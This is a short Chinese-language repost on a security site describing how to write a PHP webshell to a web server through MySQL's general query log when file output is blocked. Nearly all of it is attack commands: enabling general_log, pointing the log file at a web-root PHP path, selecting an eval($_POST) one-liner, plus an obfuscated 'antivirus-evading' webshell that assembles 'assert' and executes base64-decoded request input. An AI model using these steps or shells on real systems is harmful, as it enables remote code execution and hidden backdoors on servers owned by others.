SQL语句利用日志写shell-SQL语句利用日志写shell-华盟网

SQL语句利用日志写shell

华盟学院山东省第二期线下学习计划

outfile被禁止,或者写入文件被拦截;

在数据库中操作如下:(必须是root权限)

show variables like '%general%';  #查看配置
set global general_log = on;  #开启general log模式
set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址 
select '<?php eval($_POST[cmd]);?>'  #写入shell

SQL查询免杀shell的语句

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

原文:http://blog.cora-lab.org/287.html

文章出处:Evi1cg's blog   

原文链接:https://evi1cg.me/archives/test1.html

www.idc126.com

本文由来源 Evi1cg's blog,由 excalibur 整理编辑,其版权均为 Evi1cg's blog 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

2

发表评论